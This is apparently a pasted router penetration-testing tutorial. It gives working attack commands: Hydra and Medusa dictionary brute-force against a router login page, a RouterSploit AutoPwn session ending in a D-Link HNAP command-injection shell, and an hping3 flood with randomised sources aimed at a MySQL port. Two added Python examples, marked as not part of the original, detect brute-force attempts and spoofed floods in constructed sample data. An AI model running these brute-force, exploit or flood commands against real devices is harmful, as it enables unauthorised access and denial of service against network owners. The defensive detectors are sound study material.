viprajput

ddos and route

Aug 16th, 2018
Router Penetration Testing
==========================

A router is the central connecting device that provides connectivity to all the end devices, nodes and other network components of a particular network. Router pentesting is a process in which a network auditor cross-checks all the possible information-gathering and exploitation methods that apply to the router. The goal of router pentesting is to establish the scope of the network by identifying the total number of access points and, for each router, its MAC address, model number, vendor name and firmware version.

There are two types of attacking procedures:

Active Router Attack: In this attack we attack the router's IP directly, which is mostly 192.168.0.1 or 192.168.1.1, and try to halt the services in the network and get the juicy data out of the router.
E.g. credentials brute-force attack, Wi-Fi jammer etc. on public networks

Passive Router Attack: In this attack we do not engage the router itself; instead we work with the broadcast packet data generated by the router. The attack does not go directly to the router, but the attacker can use the data that originates from or passes through the router.
E.g. sniffing and monitoring the Wi-Fi traffic, doing MITM and other things.

Attack Vectors
Information Gathering of the Router:
When connected to the network:
Terminal : route -n
Terminal : netdiscover -r 192.168.0.1/24
(This can be used for getting the MAC address of the router)
Once we have the MAC address, https://www.macvendorlookup.com/ can be used for getting the vendor name.

How to find out more about the router vendor (when the MAC address is spoofed):

airmon-ng start wlan0
airodump-ng -M --bssid -c wlan0mon (Big Window)

-----------------------------------------------------------------

http://192-168-1-1ip.mobi/default-router-passwords-list/
http://www.routerpasswords.com/
https://www.bestvpn.com/default-router-login-details/

---------------------------------------------------------------------

Brute Forcing on Default Credentials:
Default credentials are those that have not been changed since the router was purchased; these are the credentials for the router's login page.
Mostly the username is simply Admin.

For brute forcing we are going to use some advanced brute-force tools, which are pre-installed in Kali Linux.
Tools: Hydra, Medusa, xHydra, Burp Suite

Attacking Methods:

Hydra : #hydra -l Admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 -m http-get

Here, -l : username; -P : passwords, where we supply a dictionary of credentials (rockyou.txt); http-get / http-post : way of transmission of data; 192.168.0.1 : default router's IP address.

Medusa : #medusa -h 192.168.0.1 -u Admin -P <dictionary file> -M http

Here, -h : target IP address; -u : username; -P : password, where we can supply a dictionary of credentials; -M : method of transmission
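
A defender's view of the dictionary attacks above, as an added example that is not part of the original paste: it counts failed logins per source in a sliding window over access-log lines for the router's admin page. The log format, the sample lines, the function names and the thresholds are assumptions made for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed format: Common Log Format lines from the web server in front of the admin page.
LINE_RE = re.compile(
    r'(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "[^"]*" (?P<status>\d{3}) \S+'
)


def constructed_log():
    """Constructed sample log, not captured from a real device."""
    fmt = '{} - Admin [16/Aug/2018:10:00:{:02d} +0000] "GET / HTTP/1.1" {} 0'
    # One host failing authentication once per second: the dictionary-attack pattern.
    lines = [fmt.format("192.168.0.23", sec, 401) for sec in range(8)]
    # A user who mistypes the password twice and then logs in.
    lines += [fmt.format("192.168.0.10", sec, status)
              for sec, status in ((3, 401), (9, 401), (15, 200))]
    return "\n".join(lines)


def failed_logins(log_text):
    """Yield (timestamp, source) for every response with status 401 or 403."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and m["status"] in ("401", "403"):
            yield datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"), m["src"]


def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=10)):
    """Return {source: peak failure count in any window} for sources reaching threshold."""
    recent = defaultdict(deque)
    peaks = {}
    for ts, src in sorted(failed_logins(log_text)):
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:  # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            peaks[src] = max(peaks.get(src, 0), len(q))
    return peaks


if __name__ == "__main__":
    for src, count in detect_bruteforce(constructed_log()).items():
        print(f"possible brute force from {src}: {count} failures within 10 s")
```

Changing the default credentials and locking out or delaying a source after a few failures removes the conditions this kind of attack depends on.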


Routersploit Framework (RSF)
============================
It is a tool written in Python used for automating the process of router exploitation. It is not pre-installed in Kali Linux, so we have to get it from external sources.

Downloading Steps:
Installation on Kali Linux:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Running Steps:

When the Routersploit Framework is on,
rsf > help (for the help menu)
Global commands:
help - Print this help menu
use <module> - Select a module for usage
exec <shell command> <args> - Execute a command in a shell
search <search term> - Search for appropriate module
exit - Exit RouterSploit
rsf > use scanners/ (using scanners: this will show the list of every scanner)
scanners/2wire_scan
scanners/billion_scan
scanners/huawei_scan
scanners/netcore_scan
scanners/tplink_scan
scanners/3com_scan
scanners/cameras_scan
scanners/ipfire_scan
scanners/netgear_scan
scanners/ubiquiti_scan
scanners/asmax_scan
scanners/cisco_scan
scanners/juniper_scan
scanners/netsys_scan
scanners/zte_scan
scanners/asus_scan
scanners/comtrend_scan
scanners/linksys_scan
scanners/routers_scan
scanners/zyxel_scan
scanners/autopwn
scanners/dlink_scan
scanners/misc_scan
scanners/shuttle_scan
scanners/belkin_scan
scanners/fortinet_scan
scanners/movistar_scan
scanners/technicolor_scan
scanners/bhu_scan
scanners/grandstream_scan
scanners/multi_scan
scanners/thomson_scan
rsf > use scanners/autopwn (using autosearch)
rsf (AutoPwn) > show options

Target options:

Name       Current settings     Description
----       ----------------     -----------
target                          Target IP address e.g. 192.168.1.1
port       80                   Target port


Module options:

Name       Current settings     Description
----       ----------------     -----------
threads    8                    Number of threads


rsf (AutoPwn) >

rsf (AutoPwn) > set target 192.168.0.1
[+] {'target': '192.168.0.1'}
rsf (AutoPwn) > show options

Target options:

Name       Current settings     Description
----       ----------------     -----------
target     192.168.0.1          Target IP address e.g. 192.168.1.1
port       80                   Target port


Module options:

Name       Current settings     Description
----       ----------------     -----------
threads    8                    Number of threads


rsf (AutoPwn) >


[*] Could not verify exploitability:
- exploits/routers/dlink/dsl_2740r_dns_change
- exploits/routers/dlink/dir_815_850l_rce
- exploits/routers/dlink/dsl_2640b_dns_change
- exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
- exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
- exploits/routers/shuttle/915wm_dns_change
- exploits/routers/billion/5200w_rce
- exploits/routers/cisco/catalyst_2960_rocem
- exploits/routers/cisco/secure_acs_bypass

[+] Device is vulnerable:
- exploits/routers/dlink/multi_hnap_rce

rsf (AutoPwn) > use exploits/routers/dlink/multi_hnap_rce
rsf (D-Link Multi HNAP RCE) > show options

Target options:

Name       Current settings       Description
----       ----------------       -----------
target                            Target address e.g. http://192.168.1.1
port       80                     Target Port


rsf (D-Link Multi HNAP RCE) > set target 192.168.0.1
[+] {'target': '192.168.0.1'}
rsf (D-Link Multi HNAP RCE) > show options

Target options:

Name       Current settings       Description
----       ----------------       -----------
target     http://192.168.0.1     Target address e.g. http://192.168.1.1
port       80                     Target Port


rsf (D-Link Multi HNAP RCE) >
rsf (D-Link Multi HNAP RCE) > run
[*] Running module...
[*] Target might be vulnerable - it is hard to verify
[*] Invoking command loop...
[*] It is blind command injection, response is not available

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] Depending on the vulnerability, command's results might not be available.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

-----------------------------------------------------------------


DDOS

hping3 192.168.195.183 -c 100000000000 -d 999999999 --rand-source --flood -p 3306
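
How traffic with the --rand-source and --flood options looks from the receiving side, as an added example that is not part of the original paste: a detector that flags a destination port receiving a high packet rate in which almost every packet carries a different source address. The packet records are constructed, and the function names and thresholds are assumptions.

```python
import random
from collections import defaultdict


def constructed_packets(seed=1):
    """Constructed sample of (second, src_ip, dst_ip, dst_port) records, not a real capture."""
    rng = random.Random(seed)
    pkts = []
    # Normal clients: three hosts that keep reusing their own addresses.
    for sec in range(3):
        for host in ("192.168.195.10", "192.168.195.11", "192.168.195.12"):
            pkts += [(sec, host, "192.168.195.183", 80)] * 20
    # Randomised-source pattern: nearly every packet arrives from a new address.
    for _ in range(500):
        src = ".".join(str(rng.randrange(1, 255)) for _ in range(4))
        pkts.append((1, src, "192.168.195.183", 3306))
    return pkts


def detect_spoofed_flood(packets, min_pps=200, min_unique_ratio=0.9):
    """Flag (second, dst, port) buckets with a high rate and mostly one-off sources."""
    buckets = defaultdict(list)
    for sec, src, dst, dport in packets:
        buckets[(sec, dst, dport)].append(src)
    alerts = []
    for key, sources in sorted(buckets.items()):
        ratio = len(set(sources)) / len(sources)
        if len(sources) >= min_pps and ratio >= min_unique_ratio:
            alerts.append({"bucket": key, "packets": len(sources),
                           "unique_ratio": round(ratio, 2)})
    return alerts


if __name__ == "__main__":
    for alert in detect_spoofed_flood(constructed_packets()):
        sec, dst, port = alert["bucket"]
        print(f"t={sec}s {dst}:{port} {alert['packets']} pkts, "
              f"{alert['unique_ratio']:.0%} unique sources")
```

A busy but legitimate service also shows a high packet rate, which is why the share of distinct sources is checked as well; keeping a database port such as 3306 unreachable from untrusted networks removes the target altogether.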